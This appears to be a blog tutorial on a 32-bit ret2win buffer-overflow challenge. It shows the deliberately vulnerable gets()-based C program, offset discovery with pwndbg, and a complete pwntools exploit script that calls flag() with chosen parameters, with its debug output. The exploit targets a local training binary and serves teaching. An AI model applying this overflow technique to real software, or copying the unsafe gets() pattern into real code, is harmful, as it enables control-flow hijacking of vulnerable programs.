32-bit

3KB

1. Analysis

We will start by inspecting the binary in Ghidra. Ghidra is a decompiler which translates low-level machine code into pseudo-C code to trace the somewhat original code

Original code:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>


void flag(int check, int check2) {
    if(check == 0xFACEB00C && check2 == 0x8BADF00D) {
        puts("How are you here??");
    } else {
    	puts("So close, yet so far...");
    }
}

void vuln() {
    char buffer[40];

    printf("There's nothing to see here right?\n> ");
    gets(buffer);
}

int main() {
    vuln();
    return 0;
}

Check the file type

❯ file ret2win_params
ret2win_params: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=4518b0f64749bbacbead832a7f5a1b89323d23c3, for GNU/Linux 3.2.0, not stripped

Decompiled code (vuln function):

You can also look at other decompiled functions in the Symbol Tree. Now, in this function we can clearly see the buffer is being read by gets which is a vulnerable function that reads more than the allocated bytes of the buffer

Let's take a look at flag()

Convert the values first into the original unsigned integers by right clicking and swap to the char

That looks more like the original code. The function tries to take in two arguments to validate and will output the win message if the value of the arguments are correct.

2. Plan

Seems easy enough, we just do a ret2win style attack but we will supply the correct parameters, the first one being 0xfaceb00c and the second one 0x8badf00d .

Find the offset first

pwndbg> cyclic 100
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa

 EAX  0xffffce88 ◂— 'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa'
 EBX  0x6161616c ('laaa')
 ECX  0xf7f9b8ac (_IO_stdfile_0_lock) ◂— 0
 EDX  0
 EDI  0xf7ffcb60 (_rtld_global_ro) ◂— 0
 ESI  0xffffcf8c —▸ 0xffffd1ac ◂— 'CLUTTER_IM_MODULE=ibus'
 EBP  0x6161616d ('maaa')
 ESP  0xffffcec0 ◂— 'oaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa'
 EIP  0x6161616e ('naaa')

pwndbg> cyclic -l naaa
Finding cyclic pattern of 4 bytes: b'naaa' (hex: 0x6e616161)
Found at offset 52

Grab the address of flag() using gdb

pwndbg> info functions
...
...
0x08049186  flag

3. pwntools

To ease our exploits we will be utilizng pwntools from now on

pwntools

pwntools comes with a lot of handy features such as p32() which is a function that automatically converts the address from Big-endian to Little-endian on a 32-bit binary. There is also p64() for 64-bit but we'll get to that later.

4. Exploit

from pwn import *    

# Start the process
elf = context.binary = ELF('./ret2win_params', checksec=False)
context.log_level='debug'

io = process()

offset = 52                # Offset found using gdb
flag_address = 0x08049186   # Flag address
param_1 = 0xfaceb00c        # Parameter 1
param_2 = 0x8badf00d        # Parameter 2

payload = b'A' * offset            
payload += p32(flag_address)     
payload += p32(0x0)            # Need a valid return address (placeholder)
payload += p32(param_1)    
payload += p32(param_2)     

write('payload', payload)    # Write payload into file

io.sendline(payload)        # Send payload
log.info(io.clean())        # Clean buffer to display message

One thing that should make you wonder is the 0x0. Unlike the previous example which we only return to the function to execute, we didn't care if the program crashed or not. As long as it printed our flag.

In this case, we are required to provide parameters. When the EIP is filled with the flag() address. The EIP is going to look for the next instruction and this is where 0x0 (null return address) comes in, it acts as a placeholder so the stack won't misalign causing the process to crash .

❯ python3 exploit.py
[+] Starting local process '/home/mfkrypt/pwn_blog/ret2win_params/ret2win_params': pid 927641
[DEBUG] Sent 0x45 bytes:
    00000000  41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41  │AAAA│AAAA│AAAA│AAAA│
    *
    00000030  41 41 41 41  86 91 04 08  00 00 00 00  0c b0 ce fa  │AAAA│····│····│····│
    00000040  0d f0 ad 8b  0a                                     │····│·│
    00000045
[DEBUG] Received 0x38 bytes:
    b"There's nothing to see here right?\n"
    b'> How are you here??\n'
/usr/lib/python3/dist-packages/pwnlib/log.py:396: BytesWarning: Bytes is not text; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  self._log(logging.INFO, message, args, kwargs, 'info')
[*] There's nothing to see here right?
    > How are you here??
[*] Stopped process '/home/mfkrypt/pwn_blog/ret2win_params/ret2win_params' (pid 927641)

And just like that, we called flag() with the correct params. If you notice in the debug section in this part, the 00 00 00 00 is the null return address we inputted followed by 0xfaceb00c and 0x8badf00d

[DEBUG] Sent 0x45 bytes:
    00000000  41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41  │AAAA│AAAA│AAAA│AAAA│
    *
    00000030  41 41 41 41  86 91 04 08  00 00 00 00  0c b0 ce fa  │AAAA│····│····│····│
    00000040  0d f0 ad 8b  0a                                     │····│·│
    00000045

Previousret2win with parameters Next64-bit

Last updated 1 year ago

hashtag1. Analysis

hashtag2. Plan

hashtag3. pwntools

hashtag4. Exploit

1. Analysis

2. Plan

3. pwntools

4. Exploit